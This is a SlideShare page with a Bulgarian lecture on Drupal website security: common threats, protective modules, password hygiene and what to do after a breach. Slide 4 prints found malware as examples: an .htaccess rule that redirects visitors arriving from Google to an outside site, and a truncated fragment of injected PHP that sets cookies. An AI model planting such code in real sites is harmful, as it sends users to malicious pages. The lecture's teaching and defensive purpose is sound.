SlideShare uma empresa Scribd logo

Drupal security lecture

S
slide9991

A short brief on Drupal security in Bulgarian.

Tecnologia
1 de 20
Baixar para ler offline
СИГУРНОСТ В CMS DRUPAL Общи положения за сигурност на Уеб сайтове София 10.02.2012 г. @init Lab
Мета – за сигурността на Уеб сайта Сигурността на Уеб сайта е задължение на администратора; тя е основна част от изграждането на сайта; дадена информация не съществува, ако не е налична на три места. @init Lab
Принципни положения при злонамерен достъп - изтриване на информация или подмяна на страница с друга и компрометиращо съдържание; - извличане на лични данни на потребителите в сайта; - пренасочване при достъпване от референтен сървър, към сайт с компрометиращо съдържание. @init Lab
Примери -злонамерен код в .htaccess RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteRule ^(.*)$ http://peace-security.ru/mod/index.php [R=301,L] - злонамерен код в PHP файлове global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(! @headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=". $sessdt_f."';</script>";... @init Lab
Примери Обхождане на лош бот Опит за оторизиране на несъществуващ потребител @init Lab
Основни методи за защита на информацията и сайта: - използване на криптирана връзка за оторизация (SSL логин); - оторизация на потребителски роли по IP адрес; - акуратни права на потребителите в системата; - рестрикции относно форматите за въвеждане; - защита на формуляра за оторизация; - следене дневника (log) за възможни проблеми; - вграждане на модул за архивиране на базата данни и файловете на сайта; - обновяване на ядрото/модули на системата; @init Lab
Основни методи за защита на информацията и сайта - изисквания: - SSL (статичен ip адрес на хоста и генериране на сертификат – собствен, от свободна институция, или от оторизиран източник). Инвестиция в рамките на 24-50 лв на година със закупен сертификат. (http://cacert.org/ - собствен серт.) - статичен ip адрес за управление, влиза в пакета на някои Интернет достачици. Инвестиция в рамките на 25-30 лв мес, обезпечава сигурно управление на сайта. @init Lab
Основни методи за защита на информацията и сайта - модули: - SSL чрез ръчно пренасочване на адрес към https или чрез модул http://drupal.org/project/session443 - ограничаване на достъпа на роля по ip адрес http://drupal.org/project/restrict_by_ip - създаване на периодичен архив на базата данни и файловете на сайта (ръчно/автоматизирано) http://drupal.org/project/backup_migrate * не можах да инициализирам FTP сесия, cron увисва при scheduled backup (за последния модул) @init Lab
Проверка на сигурността на сайта модули - преглед на сигурността / действия http://drupal.org/project/security_review - определяне формати за въвеждане според ролята на потребителя http://drupal.org/project/better_formats - проверка състоянието на таблиците в базата данни http://drupal.org/project/schema @init Lab
Екран от модула Security Review @init Lab
Защо паролата не е сигурен метод? - може да бъде открадната при използване на некриптирана връзка; - сама по себе си не отговаря за самоличността на въвеждащия (приказката за Али Баба); - ако не е генерирана софтуерно е възможно да бъде с ниско ниво на сигурност (повтаряемост). @init Lab
Помощни приложения - ползвайте генератор на пароли http://pwgen-win.sourceforge.net/ - криптирайте важната информация - като пароли за достъп до сървъри, на вашия компютър http://www.truecrypt.org/ - при размяна на важни пароли по електронната поща използвайте шифроване на данните. http://www.gnupg.org/ @init Lab
Екран от приложението PW Gen Генерирайте паролите на своя компютър. @init Lab
Добрите и лошите - ботове = X маркер на Вашата врата - злонамерени потребители = Касим (Али Баба) - пробиващият Системата = Шеф на крадците Методи за защита – следене на лог записите, блокиране на недобросъвестните потребители /ботове (автоматизирано) по IP адрес, ограничаване достъпа на лоши ботове чрез .htaccess файла http://blog.superhosting.bg/good-vs-bad-bots.html @init Lab
Да затворим вратата - ограничаване достъпа на ботове до сайта; http://en.linuxreviews.org/HOWTO_stop_automated_spa m-bots_using_.htaccess - автоматизирано известяване за проблеми на сайта (модул http://drupal.org/project/logging_alerts) ; - блокиране на адреси при опит за brute force attack http://drupal.org/project/login_security; @init Lab
Екран за настройка от модула Login Security @init Lab
При пробив в системата - ограничете достъпа до сайта само до себе си; - премахнете излишния софтуер от сървъра. - свържете се с хостинг компанията и проверете за последния наличен архив; - влезте през задната врата (https:// до Вашия сървър) а не през парадния вход – Лошият е вътре; - сменете всички потребителски FTP и пароли и главната за хост акаунта; - свалете базата данни и файловете на системата и ги прегледайте за злонамерен код – за OS Windows може да ви послужи приложението http://code.google.com/p/dngrep/ @init Lab
Защо сигурни сайтове? - обезпечавате Вашия труд и инвестицията на клиента; - предотвратявате възможността Интернет страницата да се използва злонамерено от трети лица; - правите Мрежата по-сигурно място за всички. @init Lab
Допълнителна стойност на Вашия труд - можете да анализирате сайтове на клиенти за нивото им на сигурност, срещу заплащане; - можете да имплементирате решения за сигурност; - можете да сключите договор за абонаментна поддръжка, обновяване на системата и следене за проблеми в сигурността. @init Lab
Все още начинаещ по въпросите за сигурността Георги Атанасов novsait@novsait.eu http://www.novsait.eu Работи с Друпал и пише теми за версия 6.0, имлементира SEO и Сигурност на системата @init Lab

Recomendados

Php security
Php securityPhp security
Php securityphristov
 
Drupal Security
Drupal SecurityDrupal Security
Drupal SecurityMartin Martinov
 
Webloz2011
Webloz2011Webloz2011
Webloz2011SuperHosting.BG
 
WordPress Security
WordPress SecurityWordPress Security
WordPress SecurityVeselin Nikolov
 
Child Care Presentation, Best Start Network
Child Care Presentation, Best Start NetworkChild Care Presentation, Best Start Network
Child Care Presentation, Best Start NetworkDavid Plumstead
 
Child care presentation
Child care presentationChild care presentation
Child care presentationlizard2012
 
Childcare Web Application
Childcare Web ApplicationChildcare Web Application
Childcare Web ApplicationDiego Perdomo
 
Apache serversideincludes(ssi)inae mpages
Apache serversideincludes(ssi)inae mpagesApache serversideincludes(ssi)inae mpages
Apache serversideincludes(ssi)inae mpagesDeepak Bhardwaj
 

Recomendados

Php security
Php securityPhp security
Php securityphristov
 
Drupal Security
Drupal SecurityDrupal Security
Drupal SecurityMartin Martinov
 
Webloz2011
Webloz2011Webloz2011
Webloz2011SuperHosting.BG
 
WordPress Security
WordPress SecurityWordPress Security
WordPress SecurityVeselin Nikolov
 
Child Care Presentation, Best Start Network
Child Care Presentation, Best Start NetworkChild Care Presentation, Best Start Network
Child Care Presentation, Best Start NetworkDavid Plumstead
 
Child care presentation
Child care presentationChild care presentation
Child care presentationlizard2012
 
Childcare Web Application
Childcare Web ApplicationChildcare Web Application
Childcare Web ApplicationDiego Perdomo
 
Apache serversideincludes(ssi)inae mpages
Apache serversideincludes(ssi)inae mpagesApache serversideincludes(ssi)inae mpages
Apache serversideincludes(ssi)inae mpagesDeepak Bhardwaj
 
4. Lesson Four - Setting up your childcare business
4. Lesson Four - Setting up your childcare business4. Lesson Four - Setting up your childcare business
4. Lesson Four - Setting up your childcare businessYorkLearning
 
High Quality and Flexible Childcare
High Quality and Flexible ChildcareHigh Quality and Flexible Childcare
High Quality and Flexible ChildcareFountainhead Montessori
 
Awesome Beginnings Childcare
Awesome Beginnings ChildcareAwesome Beginnings Childcare
Awesome Beginnings ChildcareLisa Boerum
 
ESR 505 final presentation Quality Childcare Team
ESR 505 final presentation Quality Childcare TeamESR 505 final presentation Quality Childcare Team
ESR 505 final presentation Quality Childcare TeamMarlene Allen-Harrison
 
All Things Childcare
All Things ChildcareAll Things Childcare
All Things Childcaresarahjowatkins
 
Day care facility business model
Day care facility business modelDay care facility business model
Day care facility business modelAnkit Uttam
 
Day care center
Day care centerDay care center
Day care centerFarhan Ahmed
 
Preschool program design presentation
Preschool program design presentationPreschool program design presentation
Preschool program design presentationlandrews1994
 
Zool Kids Day Care Proposal
Zool Kids Day Care ProposalZool Kids Day Care Proposal
Zool Kids Day Care ProposalZool Kids
 
Day Care Center Business Plan
Day Care Center Business PlanDay Care Center Business Plan
Day Care Center Business Plankashfi28
 
Open a Pre School
Open a Pre SchoolOpen a Pre School
Open a Pre SchoolHarshal Mistry
 
Child care Presentation
Child care PresentationChild care Presentation
Child care Presentationmonicaandreapangan
 
Pre school ppt
Pre school pptPre school ppt
Pre school pptLEIAS Educational Services Foundation
 
Small step child care - Business Plan
Small step child care - Business PlanSmall step child care - Business Plan
Small step child care - Business PlanMicha Paramitha
 
Защита и сигурност на Joomla! сайт - Joomla! Day 2013 Bulgaria
Защита и сигурност на Joomla! сайт - Joomla! Day 2013 BulgariaЗащита и сигурност на Joomla! сайт - Joomla! Day 2013 Bulgaria
Защита и сигурност на Joomla! сайт - Joomla! Day 2013 BulgariaMihail Semerdzhiev
 
Презентация Фатих
Презентация ФатихПрезентация Фатих
Презентация ФатихFatih Dmrl
 
Сигурност и права за достъп в уеб приложения изработени с работната рамка Yii
Сигурност и права за достъп в уеб приложения изработени с работната рамка YiiСигурност и права за достъп в уеб приложения изработени с работната рамка Yii
Сигурност и права за достъп в уеб приложения изработени с работната рамка YiiIlko Kacharov
 
Php security
Php securityPhp security
Php securityNikolai
 
Penetration testing for dummies
Penetration testing for dummiesPenetration testing for dummies
Penetration testing for dummiesCode Runners
 
Php sec referat
Php sec referatPhp sec referat
Php sec referatDido_mn
 
Php sec
Php secPhp sec
Php secphristov
 
Web and WS based Embedded Systems
Web and WS based Embedded SystemsWeb and WS based Embedded Systems
Web and WS based Embedded SystemsNikolay Kakanakov
 

Mais conteúdo relacionado

Destaque

4. Lesson Four - Setting up your childcare business
4. Lesson Four - Setting up your childcare business4. Lesson Four - Setting up your childcare business
4. Lesson Four - Setting up your childcare businessYorkLearning
 
Awesome Beginnings Childcare
Awesome Beginnings ChildcareAwesome Beginnings Childcare
Awesome Beginnings ChildcareLisa Boerum
 
ESR 505 final presentation Quality Childcare Team
ESR 505 final presentation Quality Childcare TeamESR 505 final presentation Quality Childcare Team
ESR 505 final presentation Quality Childcare TeamMarlene Allen-Harrison
 
Day care facility business model
Day care facility business modelDay care facility business model
Day care facility business modelAnkit Uttam
 
Preschool program design presentation
Preschool program design presentationPreschool program design presentation
Preschool program design presentationlandrews1994
 
Zool Kids Day Care Proposal
Zool Kids Day Care ProposalZool Kids Day Care Proposal
Zool Kids Day Care ProposalZool Kids
 
Day Care Center Business Plan
Day Care Center Business PlanDay Care Center Business Plan
Day Care Center Business Plankashfi28
 
Small step child care - Business Plan
Small step child care - Business PlanSmall step child care - Business Plan
Small step child care - Business PlanMicha Paramitha
 

Destaque (14)

4. Lesson Four - Setting up your childcare business
4. Lesson Four - Setting up your childcare business4. Lesson Four - Setting up your childcare business
4. Lesson Four - Setting up your childcare business
 
High Quality and Flexible Childcare
High Quality and Flexible ChildcareHigh Quality and Flexible Childcare
High Quality and Flexible Childcare
 
Awesome Beginnings Childcare
Awesome Beginnings ChildcareAwesome Beginnings Childcare
Awesome Beginnings Childcare
 
ESR 505 final presentation Quality Childcare Team
ESR 505 final presentation Quality Childcare TeamESR 505 final presentation Quality Childcare Team
ESR 505 final presentation Quality Childcare Team
 
All Things Childcare
All Things ChildcareAll Things Childcare
All Things Childcare
 
Day care facility business model
Day care facility business modelDay care facility business model
Day care facility business model
 
Day care center
Day care centerDay care center
Day care center
 
Preschool program design presentation
Preschool program design presentationPreschool program design presentation
Preschool program design presentation
 
Zool Kids Day Care Proposal
Zool Kids Day Care ProposalZool Kids Day Care Proposal
Zool Kids Day Care Proposal
 
Day Care Center Business Plan
Day Care Center Business PlanDay Care Center Business Plan
Day Care Center Business Plan
 
Open a Pre School
Open a Pre SchoolOpen a Pre School
Open a Pre School
 
Child care Presentation
Child care PresentationChild care Presentation
Child care Presentation
 
Pre school ppt
Pre school pptPre school ppt
Pre school ppt
 
Small step child care - Business Plan
Small step child care - Business PlanSmall step child care - Business Plan
Small step child care - Business Plan
 

Semelhante a Drupal security lecture

Защита и сигурност на Joomla! сайт - Joomla! Day 2013 Bulgaria
Защита и сигурност на Joomla! сайт - Joomla! Day 2013 BulgariaЗащита и сигурност на Joomla! сайт - Joomla! Day 2013 Bulgaria
Защита и сигурност на Joomla! сайт - Joomla! Day 2013 BulgariaMihail Semerdzhiev
 
Презентация Фатих
Презентация ФатихПрезентация Фатих
Презентация ФатихFatih Dmrl
 
Сигурност и права за достъп в уеб приложения изработени с работната рамка Yii
Сигурност и права за достъп в уеб приложения изработени с работната рамка YiiСигурност и права за достъп в уеб приложения изработени с работната рамка Yii
Сигурност и права за достъп в уеб приложения изработени с работната рамка YiiIlko Kacharov
 
Php security
Php securityPhp security
Php securityNikolai
 
Penetration testing for dummies
Penetration testing for dummiesPenetration testing for dummies
Penetration testing for dummiesCode Runners
 
Php sec referat
Php sec referatPhp sec referat
Php sec referatDido_mn
 
Web and WS based Embedded Systems
Web and WS based Embedded SystemsWeb and WS based Embedded Systems
Web and WS based Embedded SystemsNikolay Kakanakov
 
Защита при създаването на PHP-приложения
Защита при създаването на PHP-приложенияЗащита при създаването на PHP-приложения
Защита при създаването на PHP-приложенияNikolay Milkov
 
Kursova 116679
Kursova 116679Kursova 116679
Kursova 116679superazo
 
Web applications with Catalyst BG
Web applications with Catalyst BGWeb applications with Catalyst BG
Web applications with Catalyst BGsvilen.ivanov
 
Защита при създаване на PHP-приложения в Интернет
Защита при създаване на PHP-приложения в ИнтернетЗащита при създаване на PHP-приложения в Интернет
Защита при създаване на PHP-приложения в Интернетeismail
 
Bezopasnost i za6tita_na_web_prolojenia
Bezopasnost i za6tita_na_web_prolojeniaBezopasnost i za6tita_na_web_prolojenia
Bezopasnost i za6tita_na_web_prolojeniaMartin Kenarov
 
Безопасност и защита на Web приложения
Безопасност и защита на Web приложенияБезопасност и защита на Web приложения
Безопасност и защита на Web приложенияDiNikolo
 

Semelhante a Drupal security lecture (20)

Защита и сигурност на Joomla! сайт - Joomla! Day 2013 Bulgaria
Защита и сигурност на Joomla! сайт - Joomla! Day 2013 BulgariaЗащита и сигурност на Joomla! сайт - Joomla! Day 2013 Bulgaria
Защита и сигурност на Joomla! сайт - Joomla! Day 2013 Bulgaria
 
Презентация Фатих
Презентация ФатихПрезентация Фатих
Презентация Фатих
 
Сигурност и права за достъп в уеб приложения изработени с работната рамка Yii
Сигурност и права за достъп в уеб приложения изработени с работната рамка YiiСигурност и права за достъп в уеб приложения изработени с работната рамка Yii
Сигурност и права за достъп в уеб приложения изработени с работната рамка Yii
 
Php security
Php securityPhp security
Php security
 
Penetration testing for dummies
Penetration testing for dummiesPenetration testing for dummies
Penetration testing for dummies
 
Php sec referat
Php sec referatPhp sec referat
Php sec referat
 
Php sec
Php secPhp sec
Php sec
 
Web and WS based Embedded Systems
Web and WS based Embedded SystemsWeb and WS based Embedded Systems
Web and WS based Embedded Systems
 
Защита при създаването на PHP-приложения
Защита при създаването на PHP-приложенияЗащита при създаването на PHP-приложения
Защита при създаването на PHP-приложения
 
Kursova 116679
Kursova 116679Kursova 116679
Kursova 116679
 
Security Log Management
Security Log ManagementSecurity Log Management
Security Log Management
 
Web applications with Catalyst BG
Web applications with Catalyst BGWeb applications with Catalyst BG
Web applications with Catalyst BG
 
B3 t3 cookies
B3 t3 cookiesB3 t3 cookies
B3 t3 cookies
 
B3 t3 cookies
B3 t3 cookiesB3 t3 cookies
B3 t3 cookies
 
Защита при създаване на PHP-приложения в Интернет
Защита при създаване на PHP-приложения в ИнтернетЗащита при създаване на PHP-приложения в Интернет
Защита при създаване на PHP-приложения в Интернет
 
Bezopasnost i za6tita_na_web_prolojenia
Bezopasnost i za6tita_na_web_prolojeniaBezopasnost i za6tita_na_web_prolojenia
Bezopasnost i za6tita_na_web_prolojenia
 
Безопасност и защита на Web приложения
Безопасност и защита на Web приложенияБезопасност и защита на Web приложения
Безопасност и защита на Web приложения
 
B4 t4 include_files
B4 t4 include_filesB4 t4 include_files
B4 t4 include_files
 
B4 t4 include_files
B4 t4 include_filesB4 t4 include_files
B4 t4 include_files
 
B4 t4 include_files
B4 t4 include_filesB4 t4 include_files
B4 t4 include_files
 

Drupal security lecture

  • 1. СИГУРНОСТ В CMS DRUPAL Общи положения за сигурност на Уеб сайтове София 10.02.2012 г. @init Lab
  • 2. Мета – за сигурността на Уеб сайта Сигурността на Уеб сайта е задължение на администратора; тя е основна част от изграждането на сайта; дадена информация не съществува, ако не е налична на три места. @init Lab
  • 3. Принципни положения при злонамерен достъп - изтриване на информация или подмяна на страница с друга и компрометиращо съдържание; - извличане на лични данни на потребителите в сайта; - пренасочване при достъпване от референтен сървър, към сайт с компрометиращо съдържание. @init Lab
  • 4. Примери -злонамерен код в .htaccess RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteRule ^(.*)$ http://peace-security.ru/mod/index.php [R=301,L] - злонамерен код в PHP файлове global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(! @headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=". $sessdt_f."';</script>";... @init Lab
  • 5. Примери Обхождане на лош бот Опит за оторизиране на несъществуващ потребител @init Lab
  • 6. Основни методи за защита на информацията и сайта: - използване на криптирана връзка за оторизация (SSL логин); - оторизация на потребителски роли по IP адрес; - акуратни права на потребителите в системата; - рестрикции относно форматите за въвеждане; - защита на формуляра за оторизация; - следене дневника (log) за възможни проблеми; - вграждане на модул за архивиране на базата данни и файловете на сайта; - обновяване на ядрото/модули на системата; @init Lab
  • 7. Основни методи за защита на информацията и сайта - изисквания: - SSL (статичен ip адрес на хоста и генериране на сертификат – собствен, от свободна институция, или от оторизиран източник). Инвестиция в рамките на 24-50 лв на година със закупен сертификат. (http://cacert.org/ - собствен серт.) - статичен ip адрес за управление, влиза в пакета на някои Интернет достачици. Инвестиция в рамките на 25-30 лв мес, обезпечава сигурно управление на сайта. @init Lab
  • 8. Основни методи за защита на информацията и сайта - модули: - SSL чрез ръчно пренасочване на адрес към https или чрез модул http://drupal.org/project/session443 - ограничаване на достъпа на роля по ip адрес http://drupal.org/project/restrict_by_ip - създаване на периодичен архив на базата данни и файловете на сайта (ръчно/автоматизирано) http://drupal.org/project/backup_migrate * не можах да инициализирам FTP сесия, cron увисва при scheduled backup (за последния модул) @init Lab
  • 9. Проверка на сигурността на сайта модули - преглед на сигурността / действия http://drupal.org/project/security_review - определяне формати за въвеждане според ролята на потребителя http://drupal.org/project/better_formats - проверка състоянието на таблиците в базата данни http://drupal.org/project/schema @init Lab
  • 10. Екран от модула Security Review @init Lab
  • 11. Защо паролата не е сигурен метод? - може да бъде открадната при използване на некриптирана връзка; - сама по себе си не отговаря за самоличността на въвеждащия (приказката за Али Баба); - ако не е генерирана софтуерно е възможно да бъде с ниско ниво на сигурност (повтаряемост). @init Lab
  • 12. Помощни приложения - ползвайте генератор на пароли http://pwgen-win.sourceforge.net/ - криптирайте важната информация - като пароли за достъп до сървъри, на вашия компютър http://www.truecrypt.org/ - при размяна на важни пароли по електронната поща използвайте шифроване на данните. http://www.gnupg.org/ @init Lab
  • 13. Екран от приложението PW Gen Генерирайте паролите на своя компютър. @init Lab
  • 14. Добрите и лошите - ботове = X маркер на Вашата врата - злонамерени потребители = Касим (Али Баба) - пробиващият Системата = Шеф на крадците Методи за защита – следене на лог записите, блокиране на недобросъвестните потребители /ботове (автоматизирано) по IP адрес, ограничаване достъпа на лоши ботове чрез .htaccess файла http://blog.superhosting.bg/good-vs-bad-bots.html @init Lab
  • 15. Да затворим вратата - ограничаване достъпа на ботове до сайта; http://en.linuxreviews.org/HOWTO_stop_automated_spa m-bots_using_.htaccess - автоматизирано известяване за проблеми на сайта (модул http://drupal.org/project/logging_alerts) ; - блокиране на адреси при опит за brute force attack http://drupal.org/project/login_security; @init Lab
  • 17. При пробив в системата - ограничете достъпа до сайта само до себе си; - премахнете излишния софтуер от сървъра. - свържете се с хостинг компанията и проверете за последния наличен архив; - влезте през задната врата (https:// до Вашия сървър) а не през парадния вход – Лошият е вътре; - сменете всички потребителски FTP и пароли и главната за хост акаунта; - свалете базата данни и файловете на системата и ги прегледайте за злонамерен код – за OS Windows може да ви послужи приложението http://code.google.com/p/dngrep/ @init Lab
  • 18. Защо сигурни сайтове? - обезпечавате Вашия труд и инвестицията на клиента; - предотвратявате възможността Интернет страницата да се използва злонамерено от трети лица; - правите Мрежата по-сигурно място за всички. @init Lab
  • 19. Допълнителна стойност на Вашия труд - можете да анализирате сайтове на клиенти за нивото им на сигурност, срещу заплащане; - можете да имплементирате решения за сигурност; - можете да сключите договор за абонаментна поддръжка, обновяване на системата и следене за проблеми в сигурността. @init Lab
  • 20. Все още начинаещ по въпросите за сигурността Георги Атанасов novsait@novsait.eu http://www.novsait.eu Работи с Друпал и пише теми за версия 6.0, имлементира SEO и Сигурност на системата @init Lab